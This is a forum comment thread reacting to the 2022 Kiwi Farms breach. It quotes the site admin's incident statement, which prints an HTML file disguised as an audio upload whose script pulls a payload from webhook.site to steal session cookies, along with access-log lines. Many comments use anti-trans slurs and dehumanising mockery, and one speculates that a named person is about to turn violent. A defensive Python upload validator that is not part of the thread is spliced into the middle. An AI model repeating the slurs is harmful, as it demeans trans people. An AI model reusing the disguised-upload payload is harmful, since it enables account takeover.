all 33 comments

[–][deleted] 27 insightful - 4 fun27 insightful - 3 fun28 insightful - 4 fun -  (20 children)

😨😨😨😨😨

Those troons are going way too far....

[–]Datachost 22 insightful - 2 fun22 insightful - 1 fun23 insightful - 2 fun -  (5 children)

It's insane, all because they refused to back down on archiving what Keffals did. There's no actual proof they were the ones who doxed Keffals, the information for that seems to have come from a different site. The weird Unionist threat against him came from a weird Unionist, not KF, apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Are the regular users of KF slightly obsessive arseholes? Sure, there's no law against being a slightly obsessive arsehole though.

[–]ClassroomPast6178 13 insightful - 2 fun13 insightful - 1 fun14 insightful - 2 fun -  (3 children)

apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Seems like a weirdly suicidal thing to do in NI, second only in the “I want to die painfully” stakes to cutting down the tricolour.

[–]Datachost 10 insightful - 1 fun10 insightful - 0 fun11 insightful - 1 fun -  (2 children)

Yeah, considering Keffals is staying with a local I'd like to believe even they aren't dumb enough to do that. Which shows you how weird the bloke is who sent the death threat, that he actually thought that was a believable rumour

[–]ClassroomPast6178 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

There are people that are basically clockwork. You wind them up and watch them do something ridiculously stupid. I had a friend like that at school, he was a nightmare to deal with because other people knew that they could provoke him into extreme violence with the most ridiculously made up stories, needless to say he’s been in court a few times now.

[–]OuroborosTheory 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

[–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

Agree. For others to see: archived thread of Keffals on KF: https://archive.ph/lWQ0v

Back when I was lurking there I didn’t go to Keffals’ thread so I didn’t know who it is, beside just knowing it’s some “big lolcow”. The section in the 1st post titled “Child grooming” (next one “The Catboy Ranch”) is especially interesting, as of course Wikipedia will never tell you about these accusations. https://en.wikipedia.org/wiki/Keffals

[–]FlyingKangaroo 14 insightful - 3 fun14 insightful - 2 fun15 insightful - 3 fun -  (7 children)

This is awful... KF is already “hidden” to everyone who doesn’t know how to access it or isn’t interested in looking for it/who didn’t have an account there, why do this?

[–]brimshaeBased Woodchipper Merchant 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

Because we're not allowed to call out child predators anymore.

[–][deleted] 11 insightful - 2 fun11 insightful - 1 fun12 insightful - 2 fun -  (1 child)

I also would like to know that.... Also, how did those troons even manage to attack the TOR Network?

[–]FlyingKangaroo 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

After all I assume some of them know how to access TOR sites (sometimes certainly for dark purposes... heh), so? The answer is always someone’s tech skills. Too bad they’re wasted by such degenerates.

[–][deleted]  (2 children)

[deleted]

    [–]Datachost 12 insightful - 2 fun12 insightful - 1 fun13 insightful - 2 fun -  (1 child)

    At this point you could just about team up with ISIS

    Unlikely. Even ISIS get to have a twitter account.

    [–]Dzonatan 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

    Keffals caused a Streisand Effect with his every move and is too arrogant to change his approach.

    A subset of spectators have an "oh really?" approach and don't take things at face value. What do I mean by this? Here's some examples:

    Keffals proclaims that KF is a den of nazis. Someone goes "oh really? I want to check it out and see for myself".

    Keffals proclaims that KF is down. Someone goes "oh really? I'll go check it out and see if it's really down".

    Keffals proclaims that KF is using TOR. Someone goes "oh really? What's TOR in the first place? I'll go check it out".

    Shame doesn't work on curious people and the longer it goes the more people start paying attention. There's only one thing Null needs to do. Keep being stubborn and bring site back up over and over and over again. Eventually Keffals will lose his patience and do something so drastic that not even troon status will protect him from jail time.

    In his latest update Null had to go for a week. Before that there were some murmurs about his family problems and some mention about his family being threatened. That sounds to me like Keffals is on the verge of madness and is just logistics away from grabbing a knife and going to his country.

    [–][deleted]  (2 children)

    [deleted]

      [–][deleted] 6 insightful - 4 fun6 insightful - 3 fun7 insightful - 4 fun -  (1 child)

      Lmao So these troons wasted money on some amateur hacker? Good, served those fags right. Now they have much less money for their estrogen shots, lol🤡🤡🤡

      [–]deusex 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (1 child)

      This is cyberterrorism. Simple as.

      [–]handbananasrevenge 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (0 children)

      Cyberterrorism cheered on by social terrorists.

      [–]FlyingKangaroo 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

      On such topics it’s also good to know that they also attacked lolcow.farm in the past, posting very disgusting illegal materials there... Discussion about the topic here: https://lolcow.farm/meta/res/44601.html#q44601

      [–][deleted] 20 insightful - 1 fun20 insightful - 0 fun21 insightful - 1 fun -  (6 children)

      That explains why I couldn't get on today I guess. I hope they don't come for saidit next. Whenever a space exists for people who aren't SJWs now it seems like it either gets compromised or destroyed. I just want to talk to like minded people instead of militant leftists. I'd be fine with them staying on sites for that if there were sites for other people to maybe vent or joke or talk about it, especially because I live in Canada and it is hard to find people my age who are not obsessed with bringing up race or gender or something about how weapons are bad but complain when women need to be cautious on their own because they might get assaulted, we can't have even pepper spray and men can get assaulted too but apparently having any self defense that isn't your own body is the only way.

      I can't talk about this stuff in real life. Plus the transgender ideology has really gotten big here. It targets a lot of mentally ill young women here, I almost believed it when I was like 14 because I was really insecure and lonely cause I didn't like makeup (Only cause I felt like it was like lying and I wanted to be pretty without it) so I got caught up in their forums and since I had no free time or anyone to say "Hey, that stuff is not right, you are a teenager and just figuring stuff out" I read the subreddits and almost ended up socially coming out and asking my therapist about being transgender, but thankfully she brushed it off and so did my parents and I got over it a year or two later, thank god. I realized it was all a bunch of nonsense when I met my older cousin one day. She was going by male pronouns but she wasn't on any hormones, she was autistic and she kept saying things like dissociating like me, a 14 year old girl knew what it even meant, she was nice and stuff but she seemed really unwell. It freaked me out honestly, I realized I didn't want to end up like she did, I know that is really rude but she was really off.

      I cannot say any of that to anyone in real life, I need somewhere online or something, just so I can blow off some steam from this sjw stuff in my own life, it is everywhere and people have places if they are sjws but they can't stand when we want to just have something to ourselves.

      Sorry for ranting, I know it isn't a big deal but I don't know anyone my age in real life who isn't super left wing now. I know I sound dramatic and it isn't the end of the world (not literally I guess) but I just want to go on a forum or website without the preachy tones. I'm just a bit disappointed because the internet is getting super boring without dissent. Oh well. I found Kiwifarms to be refreshing compared to most sites now, I am surprised these people can't let go of their obsession with taking it down.

      [–]filbs111 14 insightful - 1 fun14 insightful - 0 fun15 insightful - 1 fun -  (2 children)

      Being a young woman with a brain in Canada must be a pain in the arse. It worked out for Lindsay Shepherd though. Stay the course!

      [–][deleted] 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

      Thank you! I have one good friend in my area but it can get lonely otherwise!

      [–]FlyingKangaroo 5 insightful - 1 fun5 insightful - 0 fun6 insightful - 1 fun -  (0 children)

      Thank God I don’t live in Canada.

      [–][deleted]  (2 children)

      [deleted]

        [–][deleted] 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (1 child)

        Eh, I don't think I'm a clown for being concerned about this stuff. An idiot maybe but everyone is different I guess.

        [–]Vulptexghost fox girl ^w^ 12 insightful - 1 fun12 insightful - 0 fun13 insightful - 1 fun -  (3 children)

        How would they get their passwords? I would hope it's not stored in plain text.

        [–]IMissPorn 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

        They probably didn't. This announcement is just saying that given the severity of the breach, you should assume it has been compromised and respond accordingly.

        [–]ClassroomPast6178 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (1 child)

        About ten or fifteen years ago it would be with rainbow tables, but these days you can run hash crackers on GPUs. A couple of breaches over the years allowed the collection of millions of hashed passwords which have now been cracked, so combine the hash cracker software with the database of cracked hashes and, whilst it still isn’t trivial, it’s not rocket science either to reveal passwords. Passwords need to go the way of the dodo, we need a better security solution.

        Have I been pwned is a very useful resource.

        This article is a little out of date, but it explains everything really well.

        [–]ClassroomPast6178 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

        I guess this is why they had so many warnings about Opsec when you signed up to KF, this scenario being the worst case.

        [–]jet199 5 insightful - 4 fun5 insightful - 3 fun6 insightful - 4 fun -  (2 children)

        Your passwords were likely protected because our system can't cope with small data export requests.

        [–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

        It's not a bug, it's a security feature!

        [–]notafed 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

        I use different passwords for every site. I'm not worried about that.

        [–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

        From kiwifarms.net:

        Site Breach

        User Impact Statement

        The forum was hacked. You should assume the following.

        • Assume your password for the Kiwi Farms has been stolen.
        • Assume your email has been leaked.
        • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.

        Thankfully, most users pay attention to my privacy checkups and there isn't much to leak. You should take a moment to read privacytools.io, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyTools. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

        I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence.

        Prognosis

        The site will be restored from a backup point taken at September 17th at Noon GMT.

        This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

        Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurriedly replaced old systems with new ones that are not properly vetted.

        Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

        I am very, very tired of writing statements like this, but I find it difficult to stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

        More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

        Technical Explanation

        Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

        A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

        Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last activity, register date, user state (banned/unverified), post count, and if they are staff.

        However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

        2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"

        It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data. The file uploaded was an .opus file that contained a web document that looked like this.

        <!DOCTYPE html>
        <script src=//webhook.site/payload-url> </script>

        I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.

        The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

        The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

        x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36

        You can find relevant scripts below.

        https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
        https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
        https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

        XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

        The sophistication in this attack is very high, and shows an intimate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

        There are so many more people trying to destroy than create.

        Take it easy,
        Josh
        jcmoon@pm.me

        P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.
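The quoted statement describes an HTML document stored under an .opus name and later rendered in users' browsers. The following is an added example, not code from XenForo, the site or ruforo, of the two server-side controls that address that: checking an upload's container bytes instead of its name, and serving stored media with headers that prevent it being rendered as a page. Function names and sample bytes are constructed for illustration, and the check is structural only (the Ogg page CRC is not verified).

```python
import struct

OGG_MAGIC, OPUS_MAGIC = b"OggS", b"OpusHead"
BOS_FLAG = 0x02  # "beginning of stream" bit in the Ogg page header


def check_opus_upload(data: bytes) -> tuple[bool, str]:
    """Decide from the bytes alone (never the filename) whether this is Ogg Opus.

    Structural check only: the page CRC is not verified here.
    """
    if len(data) < 27 or data[:4] != OGG_MAGIC:
        return False, "missing OggS capture pattern"
    if data[4] != 0:
        return False, "unsupported Ogg version"
    if not data[5] & BOS_FLAG:
        return False, "first page is not beginning-of-stream"
    body_start = 27 + data[26]            # 27-byte header + segment table
    if len(data) < body_start:
        return False, "truncated segment table"
    body_len = sum(data[27:body_start])   # lacing values give the page body size
    packet = data[body_start:body_start + body_len]
    if len(packet) < 19 or packet[:8] != OPUS_MAGIC:
        return False, "first packet is not an OpusHead header"
    if packet[9] == 0:
        return False, "OpusHead declares zero channels"
    return True, "ok"


def media_response_headers() -> dict[str, str]:
    """Headers for serving stored media so it is never rendered as a page."""
    return {
        "Content-Type": "audio/ogg",               # fixed by the server, not the uploader
        "X-Content-Type-Options": "nosniff",       # no MIME sniffing into text/html
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


def build_sample_opus_page() -> bytes:
    """Constructed minimal first Ogg page carrying an OpusHead packet."""
    head = OPUS_MAGIC + struct.pack("<BBHIhB", 1, 2, 312, 48000, 0, 0)
    page = OGG_MAGIC + struct.pack("<BBqIIIB", 0, BOS_FLAG, 0, 1, 0, 0, 1)
    return page + bytes([len(head)]) + head


# Constructed sample shaped like the HTML document quoted in the statement.
HTML_AS_OPUS = b"<!DOCTYPE html>\n<script src=//example.invalid/x.js></script>\n"

if __name__ == "__main__":
    print(check_opus_upload(HTML_AS_OPUS))
    print(check_opus_upload(build_sample_opus_page()))
    print(media_response_headers())
```

The header set matters even when the byte check passes, because a file can begin with a valid Ogg page and still carry markup further in; a fixed `Content-Type` with `nosniff` keeps the browser from interpreting it as HTML.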

        [–]sproketboy 2 insightful - 3 fun2 insightful - 2 fun3 insightful - 3 fun -  (1 child)

        r/lolphp

        [–]omegamissingnopneumonoultramicroscopicsilicovolcanoconiosisexualgender 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

        wrong site

        [–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

        Some current KF discussion from Lolcow.farm: https://lolcow.farm/snow/res/1649200.html#q1649200

        Osaki, the trans wolf, is sending a fake document (containing false allegations of CSAM in the farms) to every domains

        Now that’s something I didn’t know.